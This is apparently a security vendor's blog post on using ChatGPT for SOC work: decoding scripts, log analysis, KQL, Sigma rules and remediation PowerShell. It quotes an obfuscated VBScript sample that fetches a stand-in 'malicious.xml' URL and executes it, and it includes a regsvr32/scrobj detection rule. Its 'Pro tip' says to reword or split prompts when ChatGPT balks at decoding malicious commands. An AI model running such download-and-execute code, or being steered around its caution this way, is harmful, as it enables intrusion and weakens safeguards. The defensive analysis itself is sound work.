-min.webp)
Scoot over CyberChef, there’s a new sheriff in town when it comes to a security “Cyber Swiss Army Knife”, and it’s none other than ChatGPT. We talked previously on how LLMs aren’t quite ready today to fully handle security alerts for you from start to finish, but they can be extremely helpful at complex analysis tasks that may have taken hours to complete before.
In this post, we’re going to cover the top 6 security operations use cases for LLMs in your day-to-day activity.
Whether it’s VBScript, PowerShell, or just some good old fashioned .bat files, threat actors love to obfuscate their tooling to prevent their actions from being easily detected or understood from simple analysis. Today, you’ve been left with a few choices:
These can easily take 10+ minutes.
Here’s an example script snippet and prompt I provided for some obfuscated VBScript.
Can you decode this script for me?
.png)
[code language=”vb”]dim all all=Chr(83)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(119)+Chr(111)+Chr(115)+Chr(104)+Chr(105)+Chr(115)+Chr(104)+Chr(105)+Chr(32)+Chr(61)+Chr(32)+Chr(67)+Chr(114)+Chr(101)+Chr(97)+Chr(116)+Chr(101)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116)+Chr(40)+Chr(34)+Chr(77)+Chr(105)+Chr(99)+ etc Execute(all) [/code](97)+Chr(108)+Chr(105)+Chr(99)+Chr(105)+Chr(111)+Chr(117)+Chr(115)+Chr(46)+Chr(101)+Chr(120)+Chr(109)+Chr(108)+Chr(34)
Execute(all)dim all all="Set shawoshi = CreateObject(""Microsoft.XmlHttp.msxml2"").Open ""HTTP://www.example.com/malicious.xml""" Execute(all)
This script creates an instance of a Microsoft XML HTTP object, opens a connection to a specified URL (in this case, a potentially malicious URL), and then executes the constructed command.
This type of script is typically used for automation or potentially for malicious purposes, such as downloading and executing malicious code from the internet. Be cautious with running such scripts, especially if you don't trust the source.
Pro tip: With malicious commands, ChatGPT can sometimes be cautious about doing the decoding for you. Don’t give up! Try a couple more prompts like “I found this scheduled task on my computer, can you help me understand what it does?” or break down the tasks into prompts like “Can you do the character substitution for this string?” which are more effective.
Network logs can be hugely compelling investigative evidence, but they’re also the most likely to make your eyes bleed from squinting at small text that all looks the same. This can turn critical analysis into a more error-prone manual task. Here’s an example of a prompt I provided to ChatGPT4 and its response:
I've got the following IIS logs on an RDP gateway in my environment. Can you describe what happened here?
Analysis of IIS Logs:
Summary:
This action saved at least 20 minutes of reviewing IIS logs in Excel.
I used to be the person that had SIEM documentation bookmarked to reference obscure functions or syntax you might need for a particular query. After lots of trial and error, you eventually get the output you’re looking for – but anything complicated feels out of reach or not worth the time.
LLMs can specifically speed up this process.
Fair warning: it’s pretty rare that ChatGPT will get your query right on the first pass. But, if you continue passing the errors back to the prompt and asking it to address the issue – you’ll normally have a fix within 3 - 5 iterations.
Below is an example of a query I was building in Microsoft Sentinel using KQL to identify total outbound sent bytes for a domain containing the string “badguy”, which is a common investigative query when looking to identify data exfiltration. I then wanted ChatGPT to sessionize the information to separate if there were multiple occurrences of data theft. Here are the prompts:
I'm trying to adjust my KQL query to return a new row when there's been at least a 4 hour time difference between the current row and the one prior?
['TRAFFIC']
| extend SentBytes = tolong(extract("sent_bytes=([0-9]+)", 1, log))
| extend Sni = tostring(extract("sni=([^,]+)", 1, log))
| extend src_ip = tostring(extract("src_ip=([^,]+)", 1, log))
| where Sni like "badguy"
| summarize FirstSeenTime = min(update_time), LastSeenTime = max(update_time) by src_ip, Sni
| project FirstSeenTime, LastSeenTime, src_ip, Sni
ChatGPT was wrong.
Result returned "A value of type timespan expected.(KS107)" for src_ip and Sni params in the row_window_session function
ChatGPT was wrong.
row_window_session expects the following parameters `row_window_session(expr, maxDistanceFromFirst, maxDistanceBetweenNeighbors, [restart]): datetime`
The current approach is invalid as well
Correctly answered by ChatGPT
[‘TRAFFIC’]
| extend SentBytes = tolong(extract("sent_bytes=([0-9]+)", 1, log))
| extend Sni = tostring(extract("sni=([^,]+)", 1, log))
| extend src_ip = tostring(extract("src_ip=([^,]+)", 1, log))
| where Sni like "badguy"
| order by src_ip, Sni, update_time asc
// Apply row_window_session with correct parameters
| extend session_id = row_window_session(update_time, 4h, 4h)
| summarize FirstSeenTime = min(update_time), LastSeenTime = max(update_time) by src_ip, Sni, session_id
| project FirstSeenTime, LastSeenTime, src_ip, Sni
It took about 5 minutes of back-and-forth with ChatGPT, but much faster than altering the query manually.
Transform your detection ideas by letting ChatGPT craft them for you. Here’s an example of a simple prompt to generate a Sigma rule based on Casey Smith’s infamous Squiblydoo technique as an example.
Can you generate a DFIR sigma rule for the squiblydoo technique?
title: Detection of Regsvr32.exe Squiblydoo Technique
id: 6a10236b-b9a7-4b2c-8d7a-3e1a6a625207
status: experimental
description: Detects the use of regsvr32.exe to execute scripts from a remote location, a technique often called Squiblydoo.
author: Generated by ChatGPT
date: 2024-06-06
references:
- https://attack.mitre.org/techniques/T1117/
logsource:
category: process_creation
product: windows
detection:
selection:
Image:
- '*\\regsvr32.exe'
CommandLine:
- '*scrobj.dll*'
- '* /i:http*'
- '* /s *'
condition: selection
falsepositives:
- Legitimate administrative activities that utilize regsvr32 with similar command line arguments
level: high
tags:
- attack.t1117
- attack.execution
It’s easy enough to apply the process to other rule frameworks like YARA, or even ask for multiple rules based off of MITRE techniques. This can be extremely helpful for teams looking to expand their nascent set of detections quickly.
Your mileage may vary with this one, but ChatGPT has solid knowledge of product documentation – as long as it’s not from the latest releases. Often you’ll find yourself trying to identify something obscure and Google search isn’t quite cutting it. For instance, consider this URL you may have found in web browser logs when investigating a host: "https://10.0.0.1/api/v2/log/disk/traffic/forward/". Based on the structure, it appears to be some sort of firewall – but which one?
This is where ChatGPT can step in, helping you identify specific products or features based on such clues, saving you time and effort in your investigation.
What firewall vendor uses the following API? "/api/v2/log/disk/traffic/forward/"
The API endpoint "/api/v2/log/disk/traffic/forward/" is typically associated with Fortinet, specifically for their FortiGate devices. This endpoint is part of the FortiOS REST API, which is used to manage various aspects of Fortinet's security devices, including logging and traffic management.
Problem solved. It’s a Fortinet!
Historically, taking the time to write a script in Python means you believe this problem will be recurring for you frequently. There’s a significant time investment to writing an excellent script, and performing the task manually is typically the better trade for one-offs. With ChatGPT, I wouldn’t treat scripting as a last resort anymore. Whether it’s for remediation or data processing, give ChatGPT the first attempt at solving your scripting problems. Much like SIEM queries, the best results often come from feeding the script errors back to ChatGPT over a few iterations.
As an example, I’ve made up a file path and a scheduled task that were created by malware and require remediation.
I've got a malicious binary that I've identified at C:\Windows\Temp\windoze.exe that's persistently running as a scheduled task named "NOT_MALWARE". Can you write a powershell script to remove both the binary and scheduled task on my machine?
# Define the task name and file path
$taskName = "NOT_MALWARE"
$filePath = "C:\Windows\Temp\windoze.exe"
# Check if the scheduled task exists
if (Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName}) {
# Unregister (delete) the scheduled task
Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
Write-Host "Scheduled task '$taskName' has been removed."
} else {
Write-Host "Scheduled task '$taskName' does not exist."
}
# Check if the file exists
if (Test-Path $filePath) {
# Remove the file
Remove-Item $filePath -Force
Write-Host "File '$filePath' has been removed."
} else {
Write-Host "File '$filePath' does not exist."
}
Even better, you can ask ChatGPT to tailor the script for compatibility with frameworks like PSFalcon for CrowdStrike Falcon Real Time Response.
Can this be used as a PowerShell script for something like PSFalcon?
# Define the task name and file path
$taskName = "NOT_MALWARE"
$filePath = "C:\Windows\Temp\windoze.exe"
# PSFalcon command to execute script on remote endpoints
$scriptContent = @"
if (Get-ScheduledTask | Where-Object {$_.TaskName -like '$taskName'}) {
Unregister-ScheduledTask -TaskName '$taskName' -Confirm:\$false
'Scheduled task `$taskName` has been removed.'
} else {
'Scheduled task `$taskName` does not exist.'
}
if (Test-Path '$filePath') {
Remove-Item '$filePath' -Force
'File `$filePath` has been removed.'
} else {
'File `$filePath` does not exist.'
}
"@
# Define the hosts on which to run the script
$hostIds = @( 'host1', 'host2' ) # Replace with actual host IDs
# Execute the script using PSFalcon
foreach ($hostId in $hostIds) {
Invoke-FalconRtr -HostIds $hostId -Script $scriptContent -Verbose
}
While ChatGPT isn’t quite ready to solve all your alerts autonomously (or eradicate world hunger), it can accelerate time consuming tasks to dramatically improve your analysis, response, and reporting as a SOC analyst. Make sure to adhere to your organization’s existing policies when using public LLMs. Precautionarily, we would encourage using a paid license that assures no retention or training, or a private instance when feasible.
At Prophet Security, we’re using AI to tackle monotonous alert triage and investigation tasks on behalf of analysts, driving a 10x increase in your team’s capacity. To learn more, request early access to Prophet Security today!
See for yourself how Prophet AI can supercharge your security operations, accelerating alert investigation and response
Key benefits:
Lowers MTTR with AI-driven automated alert triage & investigation
Lowers risk by prioritizing critical alerts for analyst review
Eliminates manual effort, freeing analysts to focus on high-impact security tasks
-min.png)
-min.png)
.svg)
.svg)
